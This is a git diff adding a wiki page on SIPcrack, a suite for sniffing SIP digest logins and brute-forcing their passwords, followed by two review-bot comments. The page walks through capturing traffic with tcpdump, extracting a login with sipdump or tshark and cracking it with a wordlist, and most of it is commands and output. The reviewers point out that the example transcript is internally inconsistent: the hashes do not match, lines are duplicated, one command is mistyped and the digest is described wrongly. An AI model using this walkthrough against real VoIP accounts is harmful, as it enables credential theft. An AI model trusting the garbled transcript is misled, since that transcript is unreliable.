diff --git a/password/index.md b/password/index.md index 0f1f870..2052417 100644 --- a/password/index.md +++ b/password/index.md @@ -30,7 +30,7 @@ Offline Attacks * [rcracki_mt](../tools/rcracki_mt.md) * [rsmangler](../tools/rsmangler.md) * [samdump2](../tools/samdump2.md) - * [sipcrack](../tools/_template.md) + * [sipcrack](../tools/sipcrack.md) * [sucrack](../tools/_template.md) * [truecrack](../tools/_template.md) diff --git a/tools/sipcrack.md b/tools/sipcrack.md new file mode 100644 index 0000000..2d92054 --- /dev/null +++ b/tools/sipcrack.md 
@@ -0,0 +1,134 @@ +# sipcrack + +Notes +------- +SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol. + +The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts. + +SIPcrack contains 2 programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. sipdump dumps SIP digest authentications. If a login is found, the sniffed login is written to the dump file. See 'sipdump -h' for options. + +sipcrack bruteforces the user's password with the dump file generated by sipdump. If a password is found, the sniffed and cracked login will be updated in the dump file. See 'sipcrack -h' for options. + + +Help Text +------- +``` +SIPcrack 0.2 ( MaJoMu | www.codito.de ) +---------------------------------------- + +Usage: sipcrack [OPTIONS] [ -s | -w ] + + = file containing logins sniffed by SIPdump + + Options: + -s = use stdin for passwords + -w wordlist = file containing all passwords to try + -p num = print cracking process every n passwords (for -w) + (ATTENTION: slows down heavily) + +* Either -w or -s has to be given +``` + +Example Usage +------- +Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. + +Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated. + + +Example from [aldeid](http://www.aldeid.com/wiki/Crack-VoIP) + +*Capturing the traffic* + +Let's capture the traffic using tcpdump: + +``` +$ tcpdump -s0 -w sip.pcap tcp or udp +``` + +*Isolating the login* + +sipdump is a tool shipped with SIPcrack. It enables to detect the SIP login from a related traffic capture file. 
+ +``` +$ cd ~/src/SIPcrack-0.3pre/ +$ ./sipdump -p ~/tmp/sip.pcap logins.dump + +SIPdump 0.3pre ( MaJoMu | www.codito.de ) +--------------------------------------- + +* Using pcap file '../../tmp/sip.pcap' for sniffing +* Starting to sniff with packet filter 'tcp or udp' + +* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158') + +* Exiting, sniffed 1 logins +$ cat logins.dump +192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062 +"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383 +``` + +As you can see from the string above, the login appears in clear, and the password as a MD5 hash. + +Notice that we could also have used tshark to obtain the same result: + +``` +$ tshark -r sip.pcap -Tfields -e sip.auth | grep username +Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", +nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\", +response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5, +opaque=\"04cc3f555880bdf\"\x0d\x0a +Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", +nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\", +response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5, +opaque=\"04cd38e646e760\"\x0d\x0a +``` + +*Cracking the password* + +sipcrack is based on dictionaries to crack the password. For the example, we have built a file containing our password. + +``` +$ car ~/exploits/dictionaries/test.txt +azerty +elephant +test +password +admin +password01 +Password01 +507ZEy@l +oops +oopsoops +cat +dog7 +monster + +$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump + +SIPcrack 0.3pre ( MaJoMu | www.codito.de ) +---------------------------------------- + +* Found Accounts: + +Num Server Client User Hash|Password + +1 192.168.1.29 212.27.52.5 0950236158 dc59495f8eb78a605a2ad5d57835a383 + +* Select which entry to crack (1 - 1): 1 + +* Generating static MD5 hash... 
04cd38e646e760da129f99fa734ac1e4 +* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') +* Loaded wordlist: '~/exploits/dictionaries/test.txt' +* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') +* Tried 10 passwords in 0 seconds + +* Found password: '507ZEy@l' +* Updating dump file 'logins.dump'... done +``` + + +Links +------- +* [cracking VOIP](http://www.aldeid.com/wiki/Crack-VoIP)
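Review bot: in the password/index.md hunk, the sipcrack entry now resolves to ../tools/sipcrack.md, but the neighbouring sucrack and truecrack entries in the same Offline Attacks list still point at ../tools/_template.md; if those pages are not part of this change, either add them in a follow-up or unlink the names until they exist, so the index does not send readers to the template. Since the new page documents sipdump as well as sipcrack, consider naming the entry after the suite (SIPcrack) so readers looking for the capture side find it.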
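Review bot: in the tools/sipcrack.md hunk, the Example Usage transcript is internally inconsistent and should be corrected or replaced by an unedited run: sipdump writes the response hash dc59445f8ef78a615a2ad4d57835a383 into logins.dump, the sipcrack account table then lists dc59495f8eb78a605a2ad5d57835a383 for the same entry, the two "Starting bruteforce against user" lines (which are printed twice) go back to dc59445f..., and the value shown after "Generating static MD5 hash..." is identical to the nonce 04cd38e646e760da129f99fa734ac1e4 from the dump line rather than a separately computed hash. The sentence "the password as a MD5 hash" is also misleading: what the capture contains is the Digest response, an MD5 over username, realm, password, nonce, method and URI, which is exactly why the dump line carries the nonce, the BYE method and the request URI and why a plain MD5 wordlist lookup on the password would not match; say "the digest response computed from the password" instead. Smaller fixes in the same hunk: `$ car ~/exploits/dictionaries/test.txt` should be `$ cat ...`; the Help Text is from SIPcrack 0.2 while every example runs 0.3pre, so state which version the notes describe; and the usage line `Usage: sipcrack [OPTIONS] [ -s | -w ]` has lost the name of the positional argument that the next line describes (` = file containing logins sniffed by SIPdump`), so restore the placeholder before the `=`.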